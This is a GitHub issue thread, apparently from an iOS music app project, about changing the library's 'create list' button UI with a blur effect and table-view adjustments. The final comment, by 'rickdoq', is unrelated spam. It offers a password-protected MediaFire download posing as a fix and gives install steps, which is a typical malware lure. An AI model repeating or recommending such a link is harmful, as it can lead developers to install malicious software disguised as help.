### ISSUE TITLE
보관함 리스트 만들기 버튼 UI 수정

### ISSUE THREAD

**Issue by youn9k** [wakmusic/wakmusic-iOS#1262]
### 할 일

| AS-IS | TO-BE |
|--------|--------|
| ![simulator_screenshot_BB58138B-B888-469F-AE25-3045F421D52D](https://github.com/user-attachments/assets/4624b676-484a-4baa-91c3-726fc750b9ad) | ![simulator_screenshot_3F1D00F1-8608-4550-A079-DDCF7FCE031B](https://github.com/user-attachments/assets/05c6e354-9191-466c-8122-9a4ac3cad5be) |

블러 효과 추가 및 테이블뷰 영역 수정

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
